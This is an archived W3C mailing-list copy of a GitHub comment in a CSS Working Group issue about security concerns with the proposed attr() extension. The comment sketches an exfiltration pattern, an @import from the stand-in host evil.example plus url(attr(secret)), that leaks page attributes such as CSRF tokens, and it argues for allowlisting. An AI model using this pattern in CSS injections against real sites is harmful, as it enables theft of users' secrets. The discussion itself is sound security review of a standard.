W3C home > Mailing lists > Public > public-css-archive@w3.org > May 2020

Re: [csswg-drafts] [css-values] Security concerns regarding attr() (#5092)

From: arturjanc via GitHub <sysbot+gh@w3.org>
Date: Fri, 29 May 2020 13:46:31 +0000
To: public-css-archive@w3.org
Message-ID: <issue_comment.created-635981234-1590759990-sysbot+gh@w3.org>
> As there's no ability to concatenate in CSS, these would become a relative URL resulting in a request to the server that supplied the HTML (or, perhaps, the stylesheet, depending on the outcome of #5079). So you couldn't send a request just anywhere.

That's a great illustration of the security issue this feature runs into: currently, browsers (at least Chrome and Firefox) resolve relative URLs based on the location of the stylesheet, not the loading document. So any CSS injection could just use `@import url(//evil.example)` and then in the malicious stylesheet exfiltrate the contents of all attributes on the page via `url(attr(secret))`, which would send requests to `evil.example/<attribute-value>`.

Currently, attackers can still query against the contents of attributes with CSS3 selectors, but that's a single-bit information leak, requiring thousands of requests (and recursively adding new stylesheets to the page) to exfiltrate something like a CSRF token. This makes such attacks more difficult to conduct in practice, and makes them more time-consuming, increasing the chance that a user would navigate away from the page before the attacker can leak the secret. Giving `attr()` more capabilities as proposed here would allow direct exfiltration of all attribute values on a page with a single injected stylesheet, substantially increasing the security impact of CSS injections.

I don't think disallowing this on certain elements is sufficient, given the large amount of data modern applications have in `data-*` attributes, URLs, and attributes on custom elements. The only safe solution I can think of would be to allowlist attributes such as `data-css-*`; of course existing use of `attr()` in the `content` property could be exempt from that.

GitHub Notification of comment by arturjanc
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-635981234 using your GitHub account
Received on Friday, 29 May 2020 13:46:33 UTC

This archive was generated by hypermail 2.4.0 : Tuesday, 5 July 2022 06:42:07 UTC